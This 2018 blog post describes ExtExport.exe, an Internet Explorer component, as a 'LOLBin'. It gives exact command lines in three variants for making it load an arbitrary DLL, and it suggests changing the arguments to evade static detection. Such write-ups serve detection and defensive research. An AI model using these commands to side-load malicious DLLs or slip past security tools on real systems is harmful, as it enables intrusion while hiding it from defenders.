

Posted on [2018-04-24](#)

[← Previous](#) [Next →](#)

ExtExport – yet another LOLBin

This is a quick & dirty recipe how to load a DLL of your choice using a built-in tool ExtExport.exe that can be found inside the Internet Explorer directory:

Method #1

- Drop a file named like one of these:
 - mozcr19.dll
 - mozsqlite3.dll
 - sqlite3.dllinside the c:\test folder
- Now run:
 - “C:\Program Files\Internet Explorer\ExtExport.exe” c:\test foo bar

This will load one (or all) of these DLLs.

Method #2

The tool has more arbitrary DLL loading possibilities that allow to specify the name of the library directly from a command line.

This method requires providing more arguments e.g.:

- ExtExport.exe c:\Test\test.dll 2 3 4 FIREFOX {00000000-0000-0000-0000-000000000000}

I have not explored what other arguments mean but you can swap them with whatever you want to evade static detection; what matters is that the first argument must be a DLL name we want to load and the last argument must be a valid GUID presented in a form shown in a syntax above (acceptable by the IIDFromString function).

Method #3

It’s actually a variant of the method 2 – we just need to swap ‘FIREFOX’ with ‘360SE’:

- ExtExport.exe c:\Test\test.dll 2 3 4 360SE {00000000-0000-0000-0000-000000000000}

This entry was posted in [Living off the land](#), [LOLBins](#) by [adam](#). Bookmark the [permalink](#).